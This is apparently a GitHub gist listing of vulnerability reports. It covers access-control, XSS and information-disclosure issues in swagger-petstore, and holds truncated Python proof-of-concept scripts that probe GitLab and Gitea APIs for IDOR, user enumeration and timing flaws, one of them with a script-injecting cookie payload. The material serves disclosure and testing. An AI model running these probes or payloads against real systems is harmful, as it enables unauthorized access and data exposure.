@HouqiyuA
HouqiyuA / gist:4efd1aac7c7c7ab0cd5db48d62541a74
Last active September 11, 2025 09:19
Incorrect Access Control
[Description]:
An issue in petstore v1.0.7 allows a remote attacker to perform arbitrary delete operations via the DELETE /pet/{petId} endpoint by bypassing API key authentication.
[Vulnerability Type]:
Incorrect Access Control
[Vendor of Product]:
https://github.com/swagger-api/swagger-petstore
[Affected Product Code Base]:
@HouqiyuA
HouqiyuA / gist:9d2c3f0ba075d01631aff879546e419c
Last active September 11, 2025 09:15
xss_for_peststore
[Description]:
Cross Site Scripting (XSS) vulnerability in petstore v1.0.7 allows a remote attacker to execute arbitrary code via a crafted script to the /api/v3/pet interface.
[Vulnerability Type]:
Cross Site Scripting (XSS)
[Vendor of Product]:
https://github.com/swagger-api/swagger-petstore
[Affected Product Code Base]:
@HouqiyuA
HouqiyuA / gist:3c36f78e8de9f6a3cfb0959477c07443
Last active November 11, 2025 06:04
Poc for Peststore Information Disclosure Vulnerability
[Description]:
An issue in petstore v1.0.7 allows a remote attacker to obtain sensitive information by accessing the non-existent endpoint /cart: the server returns a 404 error page that exposes the Servlet name (default) and the server version.
[Vulnerability Type]:
Information Disclosure Vulnerability
[Vendor of Product]:
https://github.com/swagger-api/swagger-petstore
[Affected Product Code Base]:
import requests
import json
import time
def test_idor_vulnerabilities():
host = "DEPLOYED_GITLAB_HOST"
port = "DEPLOYED_GITLAB_PORT"
url = f"http://{host}:{port}/api/v4/ci/lint"
headers = {
@HouqiyuA
HouqiyuA / gist:9f3679797243cf06b1f6e70b6b7b9e1e
Created April 25, 2025 03:37
gitlab-CWE:208(Observable Timing Discrepancy)
import requests
import json
import time
def test_extended_vulnerabilities():
base_url = "http://GITLAB_HOST/api/v4/snippets"
original_token = "7_pwYNpdf9HZAZr1pkEy" # valid token
headers = {
"Accept": "application/json",
import requests
from urllib.parse import urljoin
# Configure the target address and request headers
BASE_URL = "http://DEPLOYED_GITLAB_HOST"
ENDPOINT = "/api/v4/user/keys"
HEADERS = {
"Accept": "application/json",
"PRIVATE-TOKEN": "YOUR_TOKEN"
}
import requests
import json
def test_user_enumeration(base_url, token, start_id=1, end_id=10):
"""
Test for user enumeration vulnerability by trying sequential user IDs
:param base_url: Base API URL (e.g., 'http://192.168.126.129:9980')
:param token: PRIVATE-TOKEN value
:param start_id: Starting user ID to test
:param end_id: Ending user ID to test
import requests
TARGET_URL = "http://GITEAHOST/"
cookies = {
'lang': 'en-US"><script>alert("XSS")</script>'
}
@HouqiyuA
HouqiyuA / gist:1b5e3094d50be924b86910bd08b73c6a
Last active April 29, 2025 09:11
gitea_insecure_access_control
import requests
import json
import time
# Target
host = "192.168.126.129"
port = 3000
base_url = f"http://{host}:{port}"
# Original token from the sample
@HouqiyuA
HouqiyuA / gist:039de857c563aeca0f75bf266a0c9a0d
Last active September 25, 2025 11:47
Insecure Default Configuration
import requests
def test_error_handling():
base_url = "http://DEVELOPMENT_HOST:3000/api/v1/user/keys"
# Test cases for error handling analysis
test_cases = [
("empty_auth_header", {"Authorization": ""}),
]